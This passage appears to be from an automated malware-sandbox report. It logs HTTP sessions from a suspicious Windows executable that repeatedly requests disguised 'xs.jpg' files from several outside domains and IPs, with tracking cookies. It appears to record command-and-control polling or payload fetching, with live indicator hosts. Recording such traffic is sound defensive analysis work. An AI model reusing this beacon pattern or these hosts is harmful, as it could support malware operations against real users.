                                  70 | 192.168.2.9 | 49783 | 78.46.2.155 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:52.115367889 CEST | 192 | OUT | GET /xs.jpg?1786b5d7=1578817372 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:52.811662912 CEST | 403 | IN | HTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:01:52 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  71 | 192.168.2.9 | 49784 | 37.230.104.89 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:52.887573004 CEST | 205 | OUT | GET /images/xs2.jpg?180330c9=1611449124 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:53.602190018 CEST | 933 | IN | HTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:01:53 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:01:53.604136944 CEST | 211 | OUT | GET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:01:53.834810019 CEST | 646 | IN | HTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:01:53 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:01:53 GMT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  72 | 192.168.2.9 | 49785 | 54.244.188.177 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:53.970855951 CEST | 311 | OUT | GET /images/xs.jpg?18be425f=-973991176 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159310|1720159259|3|14|0
                                  Jul 5, 2024 08:01:54.699453115 CEST | 595 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:54 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159314|1720159259|3|15|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  73 | 192.168.2.9 | 49786 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:54.711893082 CEST | 303 | OUT | GET /xs.jpg?194bc1b3=-1324200987 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159311|1720159259|3|14|0
                                  Jul 5, 2024 08:01:55.235208988 CEST | 586 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:55 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159315|1720159259|3|15|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  74 | 192.168.2.9 | 49787 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:55.289827108 CEST | 305 | OUT | GET /images/xs.jpg?19b3dafe=-414010642 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159312|1720159260|3|14|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:01:55.793145895 CEST | 334 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:55 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159315|1720159260|3|15|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  75 | 192.168.2.9 | 49788 | 78.46.2.155 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:55.807713985 CEST | 191 | OUT | GET /xs.jpg?19fa4aca=871667092 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:56.487795115 CEST | 403 | IN | HTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:01:56 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  76 | 192.168.2.9 | 49789 | 37.230.104.89 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:56.506242990 CEST | 206 | OUT | GET /images/xs2.jpg?1a87f96c=-1624254328 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:57.243016005 CEST | 933 | IN | HTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:01:57 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:01:57.253026009 CEST | 211 | OUT | GET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:01:57.479799032 CEST | 646 | IN | HTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:01:57 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:01:57 GMT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  77 | 192.168.2.9 | 49790 | 54.244.188.177 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:57.818702936 CEST | 311 | OUT | GET /images/xs.jpg?1b477e89=-633605048 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159314|1720159259|3|15|0
                                  Jul 5, 2024 08:01:58.561428070 CEST | 595 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:58 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159318|1720159259|3|16|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  78 | 192.168.2.9 | 49791 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:58.613466978 CEST | 301 | OUT | GET /xs.jpg?1bf90ddb=938613686 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159315|1720159259|3|15|0
                                  Jul 5, 2024 08:01:59.120666981 CEST | 586 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:59 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159319|1720159259|3|16|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  79 | 192.168.2.9 | 49792 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:59.156855106 CEST | 305 | OUT | GET /images/xs.jpg?1c4eb48e=-970526750 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159315|1720159260|3|15|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:01:59.672311068 CEST | 334 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:59 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159319|1720159260|3|16|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  80 | 192.168.2.9 | 49793 | 78.46.2.155 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:59.943341017 CEST | 192 | OUT | GET /xs.jpg?1c954dcc=1438640484 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:00.599065065 CEST | 403 | IN | HTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:02:00 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                  81  192.168.2.9  49794  37.230.104.89  80  7248  C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp  Bytes transferred  Direction  Data
                                  Jul 5, 2024 08:02:00.629569054 CEST  206  OUT  GET /images/xs2.jpg?1d468c2f=-1839153941 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:01.362121105 CEST  933  IN  HTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:02:01 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:02:01.363594055 CEST  211  OUT  GET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:02:01.589080095 CEST  646  IN  HTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:02:01 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:02:01 GMT


                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                  82  192.168.2.9  49795  54.244.188.177  80  7248  C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp  Bytes transferred  Direction  Data
                                  Jul 5, 2024 08:02:01.719700098 CEST  312  OUT  GET /images/xs.jpg?1e16c26e=-1770927066 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159318|1720159259|3|16|0
                                  Jul 5, 2024 08:02:02.547447920 CEST  595  IN  HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:02 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159322|1720159259|3|17|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                  83  192.168.2.9  49796  44.221.84.105  80  7248  C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp  Bytes transferred  Direction  Data
                                  Jul 5, 2024 08:02:02.576487064 CEST  303  OUT  GET /xs.jpg?1ec6b77a=-1713269406 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159319|1720159259|3|16|0
                                  Jul 5, 2024 08:02:03.061033010 CEST  586  IN  HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:03 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159323|1720159259|3|17|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                  84  192.168.2.9  49797  44.221.84.105  80  7248  C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp  Bytes transferred  Direction  Data
                                  Jul 5, 2024 08:02:03.152790070 CEST  304  OUT  GET /images/xs.jpg?1fd1e84b=533850187 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159319|1720159260|3|16|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:02:03.652888060 CEST  334  IN  HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:03 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159323|1720159260|3|17|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                  85  192.168.2.9  49798  78.46.2.155  80  7248  C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp  Bytes transferred  Direction  Data
                                  Jul 5, 2024 08:02:03.667335987 CEST  193  OUT  GET /xs.jpg?20c162b1=-1547244171 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:04.362694979 CEST  403  IN  HTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:02:04 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                  86  192.168.2.9  49799  37.230.104.89  80  7248  C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp  Bytes transferred  Direction  Data
                                  Jul 5, 2024 08:02:04.401245117 CEST  205  OUT  GET /images/xs2.jpg?211be604=-406631908 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:05.122004032 CEST  933  IN  HTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:02:05 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:02:05.144130945 CEST  211  OUT  GET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:02:05.367907047 CEST  646  IN  HTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:02:05 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:02:05 GMT


                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                  87  192.168.2.9  49800  54.244.188.177  80  7248  C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp  Bytes transferred  Direction  Data
                                  Jul 5, 2024 08:02:05.518066883 CEST  312  OUT  GET /images/xs.jpg?2373b5c6=-1915824360 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159322|1720159259|3|17|0
                                  Jul 5, 2024 08:02:06.248229027 CEST  595  IN  HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:06 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
